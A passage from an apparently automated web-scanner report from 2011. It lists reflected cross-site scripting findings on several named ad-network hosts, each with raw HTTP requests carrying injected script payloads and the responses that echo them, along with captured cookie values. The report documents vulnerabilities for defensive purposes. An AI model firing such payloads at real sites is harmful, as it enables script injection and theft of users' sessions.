GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=12641331576"><script>alert(1)</script>5388910874&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkAAAAAAB4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fiFkxme76tO0AAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=12641331576"><script>alert(1)</script>5388910874&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1901865956?imid=2406266249759347636&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.4. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f8a"%3balert(1)//dea654c72fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90f8a";alert(1)//dea654c72fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&90f8a"%3balert(1)//dea654c72fb=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=141284751604938231; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:31 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkDAAAAAC4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjgZJgyzjKIaAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:31 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&90f8a";alert(1)//dea654c72fb=1http://ad.agkn.com/interaction!che=883479704?imid=4042303976535532058&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.5. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7755c"><script>alert(1)</script>9545d5276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&7755c"><script>alert(1)</script>9545d5276=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=141284751604938231; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:31 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkDAAAAACwBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjJIR95jMVMPAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:31 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&7755c"><script>alert(1)</script>9545d5276=1http://ad.agkn.com/interaction!che=328625300?imid=3623224920692052751&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.6. http://ad.agkn.com/iframe!t=1131! [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ab2"><script>alert(1)</script>6f8f881b193 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=b2ab2"><script>alert(1)</script>6f8f881b193 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:29 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkBAAAAACIBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fkbIcRswpNtIAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:29 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=b2ab2"><script>alert(1)</script>6f8f881b193http://ad.agkn.com/interaction!che=125802957?imid=5100450939591252808&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1487f"><script>alert(1)</script>98cccecfc5d was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1487f"><script>alert(1)</script>98cccecfc5d&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7651996674825166060&rnd=3546163719540081147&fpid=1487f"><script>alert(1)</script>98cccecfc5d&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.8. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd44d"><script>alert(1)</script>dc42d0b4e10 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6&sp=dd44d"><script>alert(1)</script>dc42d0b4e10 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7651996674825166060&rnd=7846246777807154137&fpid=6&nu=n&t=&sp=dd44d"><script>alert(1)</script>dc42d0b4e10&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75549"><script>alert(1)</script>e68499ff4ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&site=334050&section_code=14494094&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=N&75549"><script>alert(1)</script>e68499ff4ce=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!
#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; vuday1=%)0sI!!w[/N0FYbn[@`@; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:34 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:16:34 GMT
Pragma: no-cache
Content-Length: 4931
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?75549"><script>alert(1)</script>e68499ff4ce=1&Z=728x90&cb=1315404889357362&S=14494094&i=334050&ycg=&ypos=N&yprop=au%5fnews&yrc=&yyob=&_salt=1771892927&t=2" target="_parent">
...[SNIP]...

2.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66ccc"-alert(1)-"1cf28eb4781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=728x90&site=334050&section_code=14494094&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=N&66ccc"-alert(1)-"1cf28eb4781=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; 